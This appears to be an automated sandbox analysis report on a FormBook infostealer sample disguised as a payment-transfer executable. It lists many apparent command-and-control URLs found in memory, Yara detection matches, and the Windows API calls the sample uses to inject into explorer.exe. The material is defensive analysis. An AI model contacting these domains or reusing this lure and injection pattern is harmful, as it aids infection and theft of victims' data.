          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.carbeloy.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.carbeloy.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.carbeloy.com/blr/www.prodhealth.site
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.carbeloy.comReferer:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.cvmjqcid.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.cvmjqcid.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.cvmjqcid.com/blr/www.jaemagreci.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.cvmjqcid.comReferer:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.gannahealing.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.gannahealing.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.gannahealing.com/blr/www.olgadalila.com
          Source: explorer.exe, 00000009.00000002.748643610.000000000561F000.00000004.00000001.sdmpString found in binary or memory: http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ix
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.gannahealing.comReferer:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jaemagreci.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jaemagreci.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jaemagreci.com/blr/www.sweetpopntreatz.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jaemagreci.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jasa-software.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jasa-software.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jasa-software.com/blr/j
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jasa-software.comReferer:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kanaai.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kanaai.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kanaai.com/blr/www.cvmjqcid.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kanaai.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kathrynbaierling.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kathrynbaierling.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kathrynbaierling.com/blr/www.na230.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kathrynbaierling.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.long9000.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.long9000.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.long9000.com/blr/www.soheilvaseghi.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.long9000.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.na230.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.na230.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.na230.com/blr/www.jasa-software.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.na230.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.olgadalila.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.olgadalila.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.olgadalila.com/blr/www.zomapa.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.olgadalila.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.prodhealth.site
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.prodhealth.site/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.prodhealth.site/blr/www.stanchilo.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.prodhealth.siteReferer:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.soheilvaseghi.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.soheilvaseghi.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.soheilvaseghi.com/blr/www.gannahealing.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.soheilvaseghi.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.stanchilo.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.stanchilo.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.stanchilo.com/blr/www.yoshiyama-potager.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.stanchilo.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.sweetpopntreatz.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.sweetpopntreatz.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.sweetpopntreatz.com/blr/www.long9000.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.sweetpopntreatz.comReferer:
          Source: explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.yoshiyama-potager.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.yoshiyama-potager.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.yoshiyama-potager.com/blr/www.kathrynbaierling.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.yoshiyama-potager.comReferer:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.zomapa.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.zomapa.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.zomapa.com/blr/www.carbeloy.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.zomapa.comReferer:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237111867.0000000000DEB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, LogIn.csLong String: Length: 13656
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, LogIn.csLong String: Length: 13656
          Source: 0.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, LogIn.csLong String: Length: 13656
          Source: 4.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.0.unpack, LogIn.csLong String: Length: 13656
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.1.unpack, LogIn.csLong String: Length: 13656
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419E8C NtClose,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419F3A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010295D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010299D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0102B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010298A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0102A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0102AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029560 NtWriteFile,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010295F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0102A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0102A770 NtOpenThread,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010296D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C696E0 NtFreeVirtualMemory,LdrInitializeThunk,
